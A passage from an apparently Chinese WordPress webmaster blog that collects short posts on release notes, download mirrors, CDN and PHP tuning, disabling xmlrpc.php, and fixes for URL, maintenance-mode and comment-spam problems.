just the look you want. 自定义CSS Power up your site any way you wish. Add CSS to your site, or your blocks, for another level of control over your site’s look and feel. Sticky positioning Choose to keep top-level group blocks fixed to the top of a page as visitors scroll. Importing widgets Options to import your favorite widgets from Classic themes to Block themes. Local fonts in themes Default WordPress themes offer better privacy with Google Fonts now included. #### wordpress.org访问不了怎么办? 众所周知wordpress封禁大陆访问已经久了,原因是说wordpress经常受到来自大陆的攻击,索性直接把大陆封了。 这也就导致国内很多网站无法更新wordpress版本和插件更新。 那要怎么办呢? 我们可以通过访问cn.wp101.net 网址进行下载手动更新,这个地址是wordpress的国内镜像站,是可以访问的,而且速度比官方快一些。 想要更新什么插件直接搜索即可,非常方便!   #### Wordpress/discuz站点接入百度云加速后,后台登陆出现异常怎么办? 请在对应子域名的控制面板中关闭 html、目录缓存。云加速将会针对不同网站系统进行相应优化。 #### WordPress5.4.1–zh_CN发布更新,WordPress5.4.1下载地址 WordPress5.4.1 2020.4月26日更新了,此次更新主要5.4修复了一些bug。 这个安全和维护版本除了7个安全补丁外,还提供了17个bug补丁。由于这是一个安全版本,建议您立即更新站点。自WordPress3.7以来的所有版本都已更新。 WordPress5.4.1是一个短周期的安全和维护版本。下一个主要版本将是5.5版。   安全更新 七个安全问题影响WordPress5.4及更早版本。如果你还没有更新到5.4版本,那么3.7之后的所有WordPress版本都已经更新,以修复以下安全问题: Muaz Bin Abdus Sattar和Jannes的道具,他们都独立报告了密码重置令牌未正确失效的问题 ka1n4t的一个道具,用于发现某些私密帖子未经验证就可以查看的问题 Evan Ricafort在自定义程序中发现XSS问题的道具 WordPress安全团队的Ben Bidner发现了搜索块中的XSS问题 WordPress VIP/WordPress安全团队的Nick Daugherty发现了wp对象缓存中的XSS问题 Ronnie Goodrich(Kahoots)和Jason Medeiros的道具,他们在文件上传中独立报告了一个XSS问题。 用于修复WordPress自定义程序中存储的XSS漏洞的Weston Ruter道具。 此外,在WordPress5.4RC1和RC2中,Duc Nguyen发现了块编辑器中一个经过身份验证的XSS问题。它被固定在5.4 RC5。我们想肯定的是给予赞扬,并感谢他们所有的工作,使WordPress更安全。 #### WordPress5.4国内下载地址 WordPress官方宣布,WordPress 5. 4 正式版于 3 月 31 日正式面向公众发布,这是其2020 年度的第一个主要版本,并进行一些重大改进。 众所周知国内的wordpress是通过后台自动更新的,我们只能通过手动下载更新了。主机吧已经为大家下载好最新版5.4放到网盘上了,大家可以看下面下载。 #### wordpress5.7 英文版更新 wordpress5.7国内快速下载 wordpress5.7已经更新了,不过因为大版本,目前只有英文版的下载,大家如果急着更新的话,可以试试。以下是官方介绍: 现在,新的编辑器更易于使用 字体大小调整在更多地方: 现在,字体大小控件就在“列表”和“代码”块中需要的位置。无需再徒步到另一个屏幕来进行单个更改! 可重用块: 多项增强功能使可重用块更稳定且更易于使用。现在,当您单击“更新”按钮时,它们会自动与帖子一起保存。 插入器拖放: 将块和块样式从插入器中直接拖到您的帖子中。 您无需编写自定义代码就可以做更多的事情 全高对齐: 您是否曾经想制作一个像Cover块这样的块来填充整个窗口?现在你可以。 按钮块: 现在您可以选择垂直或水平布局。您可以将按钮的宽度设置为预设百分比。 社交图标阻止: 现在您可以更改图标的大小。 更简单的默认调色板 这个新的简化调色板将WordPress源代码中的所有颜色分解为7种核心颜色和56种阴影,这些颜色符合 WCAG 2.0 AA建议的 白色或黑色对比度。 在默认的WordPress仪表板配色方案中找到新的调色板,并在构建主题,插件或任何其他组件时使用它。 只需一次单击即可从HTTP到HTTPS 从现在开始,一键式将站点从HTTP切换到HTTPS。进行切换时,WordPress将自动更新数据库URL。没有更多的狩猎和猜测! 新的机器人API 通过新的Robots API,您可以在robots元标记中包含过滤器指令,并且max-image-preview: large 默认情况下,API包括该 指令。这意味着搜索引擎可以显示更大的图像预览,这可以增加您的访问量(除非该网站被标记 为非公开)。 延迟加载您的iFrame 现在,让iframe延迟加载很简单。默认情况下,loading="lazy" 当同时指定宽度和高度时,WordPress将向iframe广告代码添加 属性。 更新到jQuery 3.5.1后正在进行的清理 多年来,jQuery帮助人们以基本工具无法实现的方式在屏幕上移动事物,但是这种情况一直在变化,jQuery也在不断变化。 在5.7中,jQuery在控制台中的消息更少,从而更加集中且更具侵入性 #### WordPress5.8中文版更新 国内下载地址 本次更新最大的特点是 放弃对 IE11 的支持 自此版本起,已取消对 Internet Explorer 11 的支持。这意味着您可能在管理您的网站时遇到问题,这些问题将来不会得到解决。如果您目前使用的是 IE11,强烈建议您 切换到更现代的浏览器。 添加对 WebP 的支持 WebP 是一种现代图像格式,可为网络上的图像提供改进的无损和有损压缩。WebP 图像比它们的 JPEG 或 PNG 等效图像平均小 30% 左右,从而使网站速度更快,使用的带宽更少。 #### WordPress6.0.3更新 WordPress6.0.3中文版下载 维护和安全更新 版本6.0.3修正了一些安全问题。 欲了解更多,参见发行注记。 6.0.2版本修补了安全漏洞、修正了17个问题。 欲了解更多,参见发行注记。 6.0.1版本修复了31个问题。 欲了解更多,参见发行注记。 欢迎使用 WordPress 6.0.3 WordPress 6.0 包括 500 多项增强功能和 400 项错误修复。 本页重点介绍能让 WordPress 内容创建和站点建设体验更加丰富和直观的几个关键改进,且您还能够为开发者及任何想要详细了解 WordPress 的人找到资源。 增强的写作体验 无论您是撰写新文章还是向现有页面添加元素,写作方面的改进都比比皆是。 探索更多方法精简您的内容创作过程,包括: 跨区块选择文字并一次性进行编辑。输入两个左中括号 [[ 便可快速访问链接菜单。当您将某些区块从一种类型转换为另一种类型时(例如,从段落区块转换为代码区块),会保留现有样式。创建自定义按钮,您制作的任何新按钮都将自动保留自定义样式。通过更新的设置和控件以及标签云的新轮廓样式,让标签云和社交图标更具吸引力。 样式切换 区块主题现在包括了含多种样式变体的选项,这项更新进一步扩展了新的样式系统,并启用了在个别主题中切换站点外观的快捷键。 您可以更改可用设置(如字体粗细)和样式选项(如默认调色盘)。 只需几次点击,便可更改站点外观。 更多可用的模板选择 WordPress 6.0 包含了五个新的模板选项:作者、日期、分类、标签和分类法。这些额外模板可以为内容创建者提供极大的灵活性。此版本可以用您了解的工具或以下新选项按需定制每个模板。 可在封面区块中使用特色图片。 全新的特色图片尺寸控制项,让您更易获得符合需求的结果。 编辑模板时,在模板底部或是区块之间,快速插入器会显示区块样板和模板组件,让宁更快的完成工作并探索到新的布局选项。 查询区块支持对多个作者进行筛选,支持自定义分类法,并支持自定义没有结果时的显示内容。 整合区块样板 现在,区块样板会在所需的相应位置(如快速插入器或者创建新页眉、页脚的界面)显示。如果您是区块主题的作者,可以使用theme.json在区块目录中注册样板,让您能够为主题用户优先考虑最佳样板。 更好的列表视图 全新的键盘快捷键使您能够从列表视图中选择多个区块,可对其进行批量修改,并在列表项中自由拖放。列表视图可简单地展开或收起,默认为收起,每当您选择某个区块时便会自动定位到当前选择的区块。 区块锁定控制 现在,您可以锁定区块,选择禁止移动区块、禁止移除区块或两者,此功能简化了项目移交的复杂过程,使客户能够随心探索,自由创作,无需担心站点被意外破坏。 其他设计工具 设计工具会随着每个版本的发布而变得更加强大和直观。6.0的一些亮点包括: 节省空间但仍能一目了然显示选项的色彩面板设计。 全新的边框控制项提供了一种可完全按喜好设置边框的更简单方式。 色彩透明程度提供了更具创造性的色彩选项。 在组区块中,可一次性控制一组区块的间距、边界、排版等。 在堆叠、行、组的变化之间切换,以更灵活的布局来排序区块组。 在图库区块中使用间隙支持功能来创建不同的外观--可在所有图片之间添加间距,亦可完全删除间距。 #### wordpress6.0“Arturo”发布,中文版下载 向“Arturo”和 WordPress 6.0 打个招呼,其灵感来自格莱美奖得主爵士音乐家 Arturo O'Farrill 。 Arturo 以其对当代拉丁爵士乐的影响而闻名,他已经出版了 15 多张专辑,跨越了 5 年的时间。 花一些时间探索 WordPress 6.0,它旨在帮助您释放您的创意愿望并使您的网站建设体验更加直观。 并查看 Arturo 的一些鼓舞人心的声音,这些声音涵盖非洲古巴爵士乐、当代拉丁爵士乐等等。 2022 年的第二个主要版本发布了近 1,000 项增强功能和错误修复。 截至今天,WordPress 为全球超过 42% 的网站提供支持。 1 站点所有者和管理员应该升级以充分利用当今的许多稳定性、性能和可用性增强功能。 WordPress 内容创建者将享受一系列旨在改善写作和设计体验的新功能。 #### wordpress6.1.1更新 wordpress-6.1.1-zh_CN下载 更新内容 维护和安全更新 6.1.1版本修复了50个问题。 欲了解更多,参见发行注记。 欢迎使用 WordPress 6.1.1 此页面着重介绍自 2022 年 5 月 WordPress 发布以来的一些重大变更。您也会找到为开发者和那些希望深入了解 WordPress 的人提供的相关资源。 拥有 10 种样式变体的全新默认主题 在 5.9 和 6.0 版本针对区块主题和样式变化的基础上,新的默认主题——二〇二三——包含了 10 种不同样式 并且具备无障碍功能。 通过精炼和附加的模版提供更好的创作者体验 全新的模版在站点编辑器中包含了文章和页面的自定义模版。 “搜索和替换”工具加速了模版组件的设计。 横跨设计工具间的更多一致性和控制性 升级后的 设计元素和区块的控件 将使得布局和站点构建更加的一致、完整以及符合直觉。 菜单的创建和管理变得更加容易 导航区块中的 全新回退选项 意味着您可以编辑开启的菜单,而不需要搜索。 此外,用于选择和执行菜单的控件已经在区块设置中属于自己的位置。移动版菜单系统也在新功能的加持下获得了升级,其包括不同的图标选项,以创造属于您的菜单。 经过改进的文档设置的布局和可视化 一个更简洁、更有条理的显示将帮助您轻松查看和管理重要的文章和页面设置,尤其是模版选择器和调度器。 对所有内部区块的一键锁定设置 当锁定区块之后,一个新的开关允许您将区块锁定设置应用于诸如群组、封面和单栏的容器区块中的所有区块。 改进的区块占位符 各种区块都改进了能反映自定义选项以帮助您设计站点以及内容的占位符。比如图片区块占位符在选择图片之前就可以显示自定义的边框和双色调滤镜。 使用内部区块以编写更丰富的列表和引文 列表和引用区块现在支持内部区块,能让使用者拥有更灵活及丰富的组合,例如在引用区块里添加标题。 使用流畅排版将带来响应速度更快的文本 流式排版 让您定义可以在不同屏幕尺寸下轻松阅读的字体大小。 #### wordpress6.1发布更新,wordpress-6.1-zh_CN中文版a下载 此版本包括自该项目开始以来WordPress社区中许多人最兴奋的功能。编辑器的其他增强功能和改进为网站所有者提供了更多的控制和更轻松的自定义,同时为用户提供了更具凝聚力的体验。该版本包含许多以写作为中心的改进,因为如果您要为无声者发声,则必须专注于编写副本的人。 在版本 5.9 和 6.0 中引入了块主题和样式变体的基本元素后,WordPress 网站构建器欢迎一个新的默认主题 Twenty Twenty-Three,该主题由10 种不同的样式提供支持,并标记为“辅助功能就绪”。这些有意独特的样式可确保用户只需单击一下即可将不同的外观应用于其网站 - 所有这些都在一个主题中完成。 用于改善创作者体验的新模板 新的和更精细的模板现在使网站构建者能够更好地控制其网站的创建。在这套新模板中,在站点编辑器中找到帖子和页面的自定义模板。使用新的搜索和替换工具更快地创建和编辑页眉和页脚等模板部件,并轻松查看新站点。 设计工具以提高一致性和控制力 对设计元素和块的控件进行深思熟虑的升级,使布局和构建新站点成为更加一致、完整和直观的体验。 轻松管理菜单 导航块中的新回退选项意味着您可以编辑打开的菜单;无需搜索。另外,用于选择和处理菜单的控件在块设置中有自己的位置。移动菜单系统还升级了新功能,包括不同的图标选项,使菜单成为您的菜单。 更简洁的布局和文档设置可视化 通过更有条理的显示查看和管理帖子和页面设置,从而改进模板选择器和调度程序等功能的使用。 所有内部块的一键锁定设置 锁定块时,新的切换开关可让您将锁定设置应用于包含块中的所有块,例如组块、封面块和列块。 Improved block placeholders Various blocks have improved placeholders that reflect customization options to help you design your site and its content. For example, the Image block placeholder displays custom borders and duotone filters even before selecting an image. Compose richer lists and quotes with inner blocks The List and Quote blocks now support inner blocks, allowing for more flexible and rich compositions like adding headings inside your Quote blocks. More responsive text with fluid typography Fluid typography lets you define font sizes that adapt for easy reading in any screen size. Add starter patterns to any post type 在WordPress 6.0中,当您创建新页面时,您会看到建议的模式,因此您不必从空白页面开始。在 6.1 中,当您创建任何帖子类型的新实例时,您还将看到入门模式模式。 更快地查找区块主题 主题目录具有块主题过滤器,模式预览可让您更好地了解主题在探索不同主题和模式时的外观。 保留您的网站编辑器设置以备后用 站点编辑器设置现在对每个用户都是永久性的。这意味着您的设置现在将在浏览器和设备之间保持一致。 流线型风格系统 样式引擎中的边距、填充、排版、颜色和边框的 CSS 规则现在都集中在一个位置,减少了花在特定于布局的任务上的时间,并有助于生成语义类名。 更新了界面选项和功能 更新包括全局按钮、引文和链接等样式元素;使用 theme.json 控制链接的悬停、活动和焦点状态(尚不能在界面中控制);以及自定义块和元素的轮廓支持等功能。 布局选项的持续发展 现在可以在“样式”边栏中覆盖主题提供的默认内容尺寸,从而使网站构建器能够更好地控制全角内容。开发人员对这些控件具有精细的控制。 经典主题中的块模板部件 现在可以通过在主题的根目录下添加适当的HTML文件“parts”目录,在经典主题中定义块模板部件。 扩展了对查询循环块的支持 新的过滤器允许查询块变体支持自定义查询,以获得更强大的变体和高级分层帖子类型过滤选项。 适合您所有样式的过滤器 利用“样式”边栏中的过滤器来控制网站所有四个级别(核心、主题、用户或屏蔽)的设置,从不太具体到更具体。 间距预设可实现更快、一致的设计 节省时间并避免将值硬编码到具有预设边距和多个块填充值的主题中。 容器块的纯内容编辑支持 借助仅内容编辑设置,布局可以锁定在容器块中。在仅内容块中,其子块对列表视图不可见,并且完全不可编辑。因此,您可以控制布局,而您的作家可以专注于内容。将其与块锁定选项相结合,以对块进行更高级的控制。 其他注意事项 6.1 包括一个新的阅读时间功能,向内容作者显示页面、帖子和自定义帖子类型的大致阅读时间值。 在新网站中,网站标语默认为空,但可以在常规设置中修改。 新的模态设计提供了背景模糊效果,使您可以更轻松地专注于手头的任务。 增强WordPress 6.1可访问性 可访问性是WordPress使命的一个组成部分,即培养一个包容性的社区并支持世界各地的所有类型的用户。考虑到这一点,WordPress 6.1包括近60个更新,专门用于增强平台的可访问性。阅读这些更新,详细了解旨在改善可访问性的持续举措。 改进了WordPress 6.1的性能 WordPress 6.1 解决了超过 25 个致力于通过改进每种类型网站来提高性能的票证。完整的细分可以在性能字段指南中找到。 了解有关WordPress 6.1的更多信息 #### wordpressPHP5.4换成PHP7.0云服务器运行内存立马降50% 说出来你可能不信,网站运行环境从PHP5.4换成PHP7.0后服务器运行内存立马降50%! 主机吧博客的内存长期以来一起运在2G至3G之前,直接就导致了买一个云服务器要买4G以上的,这个配置的云服务器年付都是2千起的,用来运行一个日访问不过78百的博客实在是浪费。 最近听说PHP7.0运行效率更高,所以就把原来的PHP5.4切成了7.0的,然后把5.4的PHP给暂停了,结果内存使用率直接从原来的2G差不多3G降到了900多MB,直的很惊喜!而且测试发现博客运行并没有任何异常。 如果你的程序是wordpress,而且用的是云服务器,不防把PHP版本切成7.0的试试,速度更快哦。 #### wordpress一款解决百度移动落地页规范图片不合格的插件推荐 相信有不少站长在用百度站长平台的移动落地页检测时,出现提示:您的网页可能存在图片不可全屏查看,全屏查看后不可缩放/左右滑动的问题,影响落地页体验 主机吧之前也遇到过,不过后来朋友推荐了一款插件完美解决了这个问题。 插件名:Easy FancyBox 这款插件免费的,可以让wordpress上的文章图片点击以灯箱效果打开,完全符合百度移动体验。 插件下载地址:https://cn.wordpress.org/plugins/easy-fancybox/   #### WordPress中xmlrpc.php文件是什么?有什么作用? WordPress 始终具有内置功能,可让您与您的网站进行远程交互。 面对现实,有时您需要访问您的网站,而您的计算机不会在附近的任何地方。 长期以来,解决方案是一个名为 xmlrpc.php 。 但近年来,该文件更像是一种害虫,而不是一种解决方案。 下面我们将深入探讨 xmlrpc.php 的实际含义以及创建它的原因。 我们还概述了它导致的常见安全问题以及如何在您自己的 WordPress 网站上修补它们。 什么是 Xmlrpc.php? XML-RPC 是 WordPress 的一个特性,可以传输数据,HTTP 作为传输机制,XML 作为编码机制。 由于 WordPress 不是一个自封闭的系统,并且偶尔需要与其他系统进行通信,因此试图处理这项工作。 例如,假设您想通过移动设备在您的网站上发帖,因为您的计算机不在附近。 您可以使用 xmlrpc.php 启用的远程访问功能来做到这一点。 xmlrpc.php 启用的核心功能是允许您通过智能手机连接到您的站点,实现来自其他站点的引用和 pingback,以及与 Jetpack 插件相关的一些功能。 为什么创建 Xmlrpc.php 以及如何使用它? XML-RPC 的实现可以追溯到 WordPress 的早期,甚​​至还没有成为 WordPress。 回到互联网的早期,当连接速度非常慢时,写入和发布到网络的过程更加困难和耗时。 大多数人不是在浏览器本身内编写,而是离线编写,然后将他们的内容复制并粘贴到网络上。 尽管如此,这个过程还远非理想。 解决方案(当时)是创建一个离线博客客户端,您可以在其中撰写内容,然后连接到您的博客以发布它。 此连接是通过 XML-RPC 完成的。 有了 XML-RPC 的基本框架,早期的应用程序使用相同的连接来允许人们从其他设备登录到他们的 WordPress 站点。 现在的 XML-RPC 2008 年的 WordPress 2.6 版本提供了启用或禁用 XML-RPC 的选项。 但是,随着 WordPress iPhone 应用程序的发布,默认情况下启用了 XML-RPC 支持,并且没有选项可以关闭该设置。 直到今天,这仍然是正确的。 然而,随着时间的推移,这个文件的功能已经大大减少,文件的整体大小已经从 83kb 减少到 3kb,所以它的作用没有以前那么大了。 XML-RPC 的未来 使用新的 WordPress API,我们可以预期 XML-RPC 将完全被淘汰。 今天,这个新的 API 仍处于试用阶段,只能通过使用插件来启用。 但是,您可以期望 API 将来会直接编码到 WordPress 核心中,这将在很大程度上完全消除对 xmlrpc.php 文件的需要。 新的 API 并不完美,但它为 xmlrpc.php 解决的问题提供了更强大和更安全的解决方案。 为什么你应该禁用 Xmlrpc.php XML-RPC 的最大问题是出现的安全问题。 问题不在于 XML-RPC 直接,而是如何使用该文件对您的站点进行暴力攻击。 当然,您可以使用非常强大的密码和 WordPress 安全插件来保护自己。 但是,最好的保护模式是简单地禁用它。 XML-RPC 有两个主要弱点,过去曾被利用过。 首先是使用蛮力攻击进入您的网站。 攻击者将尝试使用各种用户名和密码组合使用 xmlrpc.php 访问您的站点。 他们可以有效地使用单个命令来测试数百个不同的密码。 这使他们能够绕过通常检测和阻止暴力攻击的安全工具。 第二个是通过 DDoS 攻击使网站脱机。 黑客会使用 WordPress 中的 pingback 功能将 pingback 即时发送到数千个站点。 xmlrpc.php 中的此功能为黑客提供了几乎无穷无尽的 IP 地址来分发 DDoS 攻击。 要检查 XML-RPC 是否在您的站点上运行,您可以通过名为 XML-RPC Validator 的工具运行它。 通过该工具运行您的站点,如果您收到错误消息,则表示您没有启用 XML-RPC。 如果您收到成功消息,则可以使用以下两种方法之一停止 xmlrpc.php。 方法 1:使用插件禁用 Xmlrpc.php 在您的 WordPress 网站上禁用 XML-RPC 再简单不过了。 导航到 插件 › 添加新 从 WordPress 仪表板 搜索 Disable XML-RPC 并安装如下图所示的插件: 激活插件,一切就绪。 这个插件会自动插入必要的代码来关闭 XML-RPC。 但是,请记住,某些现有插件可能会使用部分 XML-RPC,因此完全禁用它可能会导致插件冲突或站点的某些元素不再起作用。 如果您只想关闭 XML-RPC 的某些元素,但仍允许某些插件和功能工作,请改用以下插件: Stop XML-RPC Attack。 这个插件将阻止所有 XML-RPC 攻击,但它会继续允许像 Jetpack 这样的插件以及其他自动工具和插件保留对 xmlrpc.php 文件的访问权限。Control XML-RPC Publishing。 这允许您保留对 xmlrpc.php 提供的远程发布选项的控制和使用。 方法 2:手动禁用 Xmlrpc.php 如果您不想使用插件并更喜欢手动操作,请遵循此方法。 它将在传递到 WordPress 之前停止所有传入的 xmlrpc.php 请求。 打开您的 .htaccess 文件。 您可能必须在文件管理器或 FTP 客户端中打开“显示隐藏文件”才能找到该文件。 在您的 .htaccess 文件中,粘贴以下代码: # Block WordPress xmlrpc.php requests <Files xmlrpc.php> order deny,allow deny from all allow from xxx.xxx.xxx.xxx </Files> 重要的! 将 xxx.xxx.xxx.xxx 更改为您希望允许访问 xmlrpc.php 的 IP 地址或完全删除此行。 结论 总的来说,XML-RPC 是解决由于远程发布到 WordPress 站点而发生的一些问题的可靠解决方案。 然而,这个功能带来了一些安全漏洞,最终对一些 WordPress 网站所有者造成了相当大的破坏。 为确保您的站点保持安全,最好完全禁用 xmlrpc.php。 除非你需要远程发布和 Jetpack 插件所需的一些功能。 然后,您应该使用允许这些功能的解决方法插件,同时仍然修补安全漏洞。 #### wordpress主题启用PHP8.1后经常出现网页502的原因 最近主机吧把网站支持的PHP7.4切成了PHP8.1,因为都说PHP8.1快,主机吧也想试试。 结果切换成PHP8.1后,发现网站经常出现502的情况,重启PHP后,一段时间又出现了,更离谱的是会员登陆经常失效。 主机吧查了很久,终于发现问题所在,原因是PHP扩展opcache引起的,opcache扩展是一个PHP缓存器,可加速PHP运行效率,不过似乎并不适用于PHP8.0以上版本。 主机吧把opcache卸载后,重启PHP就正常了,不过主机吧发现没有了opcache后,网站显示的响应速度确实慢了0.1秒这样,总体上差别不大,如果网站流量不是很大的话,不建议过度优化,过度优化反而对SEO不是很友好。 #### wordpress仿百度百家风格主题模板分享 这个主题主机吧用了很久,非常简洁,而且对收录很好,主机吧就是靠这个主题起来的。是网上别人分享出来的,主机吧也是借花献佛吧。 主题介绍: 自适应、仿百度百家风格,有多个小工具,可增加文章页底部广告 其它的只能自己安装发觉吧。 下载地址: 链接: https://pan.baidu.com/s/149R60dm6xR49GYqWjbbZqw 密码: ax36 #### wordpress会员被利用展示违法内容 上次由于主机吧说过由于网站用启了wordpress会员功能,而且没有做什么限制,导致被非法利用,会员名注册的全是非法内容。 现在搜狗直接给收录了 看上图我们可以看到,这里显示的内容并不是会员发布文章的,而是会员资料,对方利用展示会员资料的形式,大量注册会员并修改会员资料,一但被搜索引擎收录了,将后患无穷,还好搜索引擎没有直接做封站处理,否则没地方哭去了,这里提供各位站长管理员,平时一定要注意网站内容,一但被挂黑了,一定要及时处理,否则一但搜索引擎反应过来,网站会直接消失在搜索引擎上的。 #### wordpress使用百度云加速CDN后图片水印功能失效? 最近有一客户接入百度云加速后,反馈图片水印功能不能用了,主机吧给让客户把CDN的缓存JS、CSS、HTML缓存、图片压缩功能都关了,结果还是不行。 后来客户检测后原来是wordpress插件问题,原来的插件DX-Watermark使用CDN后会完全失效,客户换成Image Watermark插件就好了。   #### WordPress使用百度云加速最佳优化方案 网站使用百度云加速可以起到一定效果的加速作用,但并不是什么网站使用云加速都可以加速的,用不到的话设置成云减速。 像使用WordPress博客程序的就经常有人反馈用云加速后访问慢。主机吧结合自己的经验给大家做个WordPress最佳优化教程,希望可以帮助大家。 进入我的网站,找到要优化的域名,进入查看左边加速功能,CDN   设置CDN参数,参数可以按照下图配置,需要注意的是智能压缩文件html一定要点。   设置完后我们进入自义规则   添加URL,设置WordPress后台地址不缓存(域名换成自己的域名)这样做的主要目的是为了防止开通缓存后,后台用户登陆不上。 完成自义后台地址不缓存后,我们再添加一条url设置全站缓存,像下图配置: 提交完两条配置后,通过17测你会发现各地访问速度会得到一个很大的提升。 需要注意的设置全站缓存后,网页更新和留言显示会有一定的缓存时间,具体时间在节点缓存有效期功能设置。       #### wordpress修改站点(URL)导致错误如何退回 最近一直在折腾百度云加速海外版测试站的事,本来想着给测试站弄个HTTPS,结果在wordpress后台直接修改wordpress地址(URL)和站点(URL)的时候,导致直接访问不了,后台也进不去了,显示: 此页面不能正确地重定向 Firefox 检测到该服务器正在将指向此网址的请求无限循环重定向。 有时候禁用或拒绝接受 Cookie 会导致此问题。 看到这个问题主机吧也懒得弄HTTPS了,直接把他退回原来的HTTP吧,网上找了一圈方法,发现最有效的方法就是直接通过SQL执行更换地址即可。 进入数据库管理-SQL-输入以下执行命令即可。 UPDATE wp_options SET option_value = replace( option_value, 'https://旧域名', 'http://新域名' ) WHERE option_name = 'home' OR option_name = 'siteurl'; UPDATE wp_posts SET post_content = replace( post_content, 'https://旧域名', 'http://新域名' ) ; UPDATE wp_posts SET guid = replace( guid, 'https://旧域名', 'http://新域名' ) ;   需要说明的是上面写的旧域名是指你修改后错误的地址,新域名是指你原来正常的地址。修改后执行就会改回原来正常的设置了。 #### wordpress删除未分类的分类目录方法 刚接触wordpress可能不懂如何删除未分类目录,因为未分类目录默认是不显示删除的。那么我们如何删除他呢? 其实很简单我们只要不把未分类目录设置成默认目录就可以显示删除了。操作很简单 在wordpress仪表盘,设置=》撰写  那里,有个“默认文章分类目录” 把这里原来默认的“未分类”改成其他分类目录,比如改成主机吧的互联网分享类。 保存后返回到编辑分类目录的地方,“未分类”就可以显示删除了。 #### wordpress升级插件后网页出现:Briefly unavailable for scheduled maintenance. Check back in a min 很多时候我们在更新插件的时候网页都会提示: Briefly unavailable for scheduled maintenance. Check back in a min(翻译成英文是: 暂时无法进行定期维护。请稍后再来查看。 ) 出现这个问题主要原因是更新没成功,或者更新中断所致。 如何解决这个问题呢? 1.马上通过FTP登录你的网站,删除WordPress根目录下的 .maintenance ,刷新网页即可。 2.但是有时候你会发现,根目录根本就没有 .maintenance!倡萌最近就遇到这个问题,最初以为是隐藏了,所以使用SSH登录服务器,但是依旧没有看到,怎么办?其实有一个比较简单的办法,直接新建一个空的txt文本,上传到主机空间中,然后重命名为 .maintenance,然后你会发现 .maintenance 居然不见了!不用担心,重新刷新你的网站,是不是正常了?! 3.如果还是不行,或者你想让它以后可以显示 .maintenance ,那就打开 /wp-admin/includes/class-wp-filesystem-direct.php 找到下面的代码: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 function mkdir($path, $chmod = false, $chown = false, $chgrp = false) { // safe mode fails with a trailing slash under certain PHP versions. $path = untrailingslashit($path); if ( empty($path) ) return false;   if ( ! $chmod ) $chmod = FS_CHMOD_DIR;   if ( ! @mkdir($path) ) return false; $this->chmod($path, $chmod); if ( $chown ) $this->chown($path, $chown); if ( $chgrp ) $this->chgrp($path, $chgrp); return true; } 将其改为: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 function mkdir($path, $chmod = false, $chown = false, $chgrp = false) { // safe mode fails with a trailing slash under certain PHP versions. if ( ! $chmod ) $chmod = $this->permission;   if(ini_get('safe_mode') && substr($path, -1) == '/') { $path = substr($path, 0, -1); }   if ( ! @mkdir($path) ) return false; $this->chmod($path, $chmod); if ( $chown ) $this->chown($path, $chown); if ( $chgrp ) $this->chgrp($path, $chgrp); return true; } 然后刷新FTP目录,是不是看到.maintenance了,删除它吧! #### wordpress博客/wp-json/wp/v2/comments?post=5477链接出现违规链接怎么处理? 前几天接到了当地网信办的通知,主机吧博客https://zhujib.com/wp-json/wp/v2/comments?post=5477链接出现违规链接,需要处理。 主机吧看了下,该网页出现了一个网址,而这个网址打开是黄色网站来的。主机吧查了很久,不知道这链接是怎么留下的,看着也不像被挂马。 后来,通过百度后才知道,这是文章评论留下的。 进入wordpress后台-评论 搜索网址,找到评论删掉即可。 最后,为了安全,建议把博客的wordpress关了。 #### wordpress博客启用https插件 一键启用器 随便大搜索引擎以及手机软件对https网址的重视,主机吧最近也开始把wordpress博客http弄成https了。 实在是没办法,据说越早弄对网站越好。不过转换过程序中却遇到了难题,如果服务器强制301跳转到https地址话, 会出现博客的JS、CSS这类文件还是会默认http。导致的结果就是网页打开错位,而且后台直接就显示循环重定向。 主机吧也找过很多网络教程,但是一直没能实现…… 不过还是让我找到了一个神器,Really Simple SSL插件,这个插件可以直接自动把网页上所有本地http地址自动转换成https,简直神器! 那么我们要怎么启用这个神器呢,这边来说下这边的情况。 首先我们先进入控制台-外观-编辑,找到functions.php编辑加入以下代码: add_filter('script_loader_src', 'agnostic_script_loader_src', 20,2); function agnostic_script_loader_src($src, $handle) { return preg_replace('/^(http|https):/', '', $src); } add_filter('style_loader_src', 'agnostic_style_loader_src', 20,2); function agnostic_style_loader_src($src, $handle) { return preg_replace('/^(http|https):/', '', $src); } 这样做的原因是为了把主题的CSS和JS文件转成相对地址,这也是为可以启动Really Simple SSL插件 然后进入插件官方下载地址https://wordpress.org/plugins/really-simple-ssl/ 下载插件 上传安装 安装成功后直接启用即可 注意: 启用这个插件必须要服务器443端口已经开启,并且已经有域名证书,还要可以访问。 #### WordPress博客实现网站颜色变黑白/灰白效果方法 今天一定有很多站长发现,百度、腾讯、新浪等国内大型网络平台,颜色都变成灰白了,原因是一代伟人逝世,作为80后站长,对此深感心痛!给网站颜色设置成黑白/灰白颜色,是主机吧对伟人缅怀的唯一方式。 这里主机吧教大家如何把网站颜色设置成黑白/灰白。 第一种网站变黑白方法: 在 style.css 文件顶端添加下行代码即可,有些 WordPress 网站主题有自定义 CSS 样式功能,可以直接把代码粘贴进行保存即可。 html {filter: progid:DXImageTransform.Microsoft.BasicImage(grayscale=1); -webkit-filter: grayscale(100%); } 第二种网站变灰度方法: 将以下代码放入 </head> 前即可让对应网页变黑灰色! <style type="text/css"> html { filter: progid:DXImageTransform.Microsoft.BasicImage(grayscale=1); -webkit-filter: grayscale(100%);} </style> 第三种网站变灰色方法: 如里上面的两种方式都不喜欢,可以通过修改 <html> 标签,以加入内联样式的方法,达到网页变灰的效果。 <html style="filter: progid:DXImageTransform.Microsoft.BasicImage(grayscale=1);-webkit-filter: grayscale(100%);"> 第四种网站整体变灰方法: body *{ -webkit-filter: grayscale(100%); /* webkit */ -moz-filter: grayscale(100%); /*firefox*/ -ms-filter: grayscale(100%); /*ie9*/ -o-filter: grayscale(100%); /*opera*/ filter: grayscale(100%); filter:progid:DXImageTransform.Microsoft.BasicImage(grayscale=1); filter:gray; /*ie9- */ } 好了,以上就是四种通过 CSS 滤镜让网站整体变灰的方法。 #### wordpress博客添加头条搜索时间因子教程 头条搜索前年推出以来,一直不温不火,在搜索引擎的市场占有率一直不高,甚至连搜狗都不如,不过主机吧发现头条搜索偶尔还是有一些流量的流入博客的,说明头条搜索没有主机吧想得这么差。 考虑到头条搜索优化的原因,主机吧决定给wordpress博客添加时间因子。 头条搜索站长平台给的代码是: <meta property="bytedance:published_time" content="2014-12-11T12:28:44+01:00" /> <meta property="bytedance:lrDate_time" 